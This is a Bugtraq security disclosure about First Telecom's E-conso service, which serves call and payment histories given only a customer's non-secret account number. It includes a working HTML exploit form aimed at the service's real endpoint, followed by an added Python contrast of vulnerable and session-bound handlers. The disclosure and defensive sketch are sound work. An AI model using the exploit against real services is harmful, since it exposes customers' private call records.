Bugtraq mailing list archives

First Telecom E-conso service totally insecure


From: thomas () CUIVRE FR EU ORG (Thomas Quinot)
Date: Tue, 4 Jan 2000 00:10:30 +0100


First Telecom, a company that provides a pre-paid calling card service
in France, Germany and the United Kingdom, offers a service
called E-conso which allows subscribers to check the current balance
of their account and peruse the history of all calls they made through
First Telecom.

The WWW form at the home page of the service requires entry of
the account number (which is printed on all First Telecom documents
and embossed on the plastic membership card sent to every subscriber),
as well as a password chosen by the customer during the sign-up
procedure.

The submission of this form returns a page which includes the customer's
name and address, and a form (with a /fixed/ "action" URL) which
contains the customer's account number as a "hidden" field.
Submission of this form returns the details of payments or
the call history, depending on which button is clicked by the customer.

Neither a hidden field nor a cookie is used to pass any client credentials
back to the server, which means it is trivial to retrieve the details
of past payments as well as the call history of a First Telecom
customer knowing only her (non-secret) account number.

The HTML code included demonstrates this important flaw.

Thomas.

---------- cut here : first.html

<html>

<head>
<title>First Telecom e-conso exploit</title>
</head>

<body>
<!-- Posts only the (non-secret) account number; no password or session is involved. -->
<form action="http://195.68.107.69/residential/wc.dll?firstphone~resformbutton" method="POST">
 <p>
Account number: <input type="text" name="cmaster" value="0000000">
<input type="submit" name="cmdcdr" value="Details of calls">
<input type="submit" name="cmdpaymenthistory" value="Details of payements">
 </p>
</form>
</body>
</html>
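The flaw in the message is a missing binding between the password check on the first page and the second request, which identifies the customer by nothing more than the account number. Added here as an illustration (not part of Thomas's post or of First Telecom's code) is a Python sketch of a handler with the same defect beside one that ties the account to a server-side session; the account records, passwords, session store and every field name other than `cmaster` are constructed for the example.

```python
import secrets

# Constructed sample data standing in for the operator's customer records:
# account number -> password chosen at sign-up and the call history.
ACCOUNTS = {
    "0000000": {"password": "hunter2", "calls": ["2000-01-02 19:04 +44... 3 min"]},
    "1111111": {"password": "s3cret!", "calls": ["2000-01-03 08:15 +49... 12 min"]},
}

# Server-side session store (constructed): opaque token -> account it was issued for.
SESSIONS = {}


def vulnerable_history(form):
    """Mirrors the E-conso second form: the only identifying data sent is the
    account number in the 'cmaster' field, so no credential is ever checked and
    anyone who knows the printed account number gets the history."""
    return ACCOUNTS[form["cmaster"]]["calls"]


def login(form):
    """Hardened first step: verify the password and, on success, issue a random
    session token that the server remembers as bound to this account."""
    acct = ACCOUNTS.get(form["cmaster"])
    if acct is None or not secrets.compare_digest(acct["password"], form.get("password", "")):
        return None
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = form["cmaster"]
    return token


def hardened_history(form, cookies):
    """Hardened second step: the account whose history is returned comes from
    the session cookie, never from the form. A client-supplied 'cmaster' is
    ignored, so knowing another customer's account number yields nothing."""
    acct_no = SESSIONS.get(cookies.get("session", ""))
    if acct_no is None:
        return None  # no valid session: a real server would answer 403
    return ACCOUNTS[acct_no]["calls"]
```

Note that the hardened handler still answers a request whose `cmaster` field names a different customer, but with the data of the account the session was issued for.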

